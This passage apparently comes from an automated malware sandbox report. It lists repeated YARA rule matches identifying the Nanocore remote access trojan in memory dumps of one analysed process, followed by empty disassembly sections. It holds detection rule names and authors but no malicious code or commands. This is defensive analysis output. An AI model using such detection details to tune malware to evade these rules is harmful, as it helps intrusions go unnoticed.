                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.675353317.0000000000CD0000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.675022764.0000000000570000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.675022764.0000000000570000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.675802769.00000000012A0000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.675802769.00000000012A0000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.675222027.00000000007A0000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.675222027.00000000007A0000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.675311238.0000000000B70000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.675311238.0000000000B70000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.676414114.00000000038BF000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.675233867.00000000007B0000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.675233867.00000000007B0000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.675131963.00000000006F0000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.675131963.00000000006F0000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.675241372.00000000007C0000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.675241372.00000000007C0000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.675167129.0000000000750000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.675167129.0000000000750000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.674937327.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.674937327.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.674937327.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.676573390.0000000004720000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.676573390.0000000004720000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.675197443.0000000000780000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.675197443.0000000000780000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.675397624.0000000000D00000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.675397624.0000000000D00000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.675417808.0000000000D10000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.675417808.0000000000D10000.00000004.00020000.sdmp, Author: Florian Roth
                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.675417808.0000000000D10000.00000004.00020000.sdmp, Author: Joe Security
                      Reputation:moderate

                      Disassembly

                      Code Analysis

                      Reset < >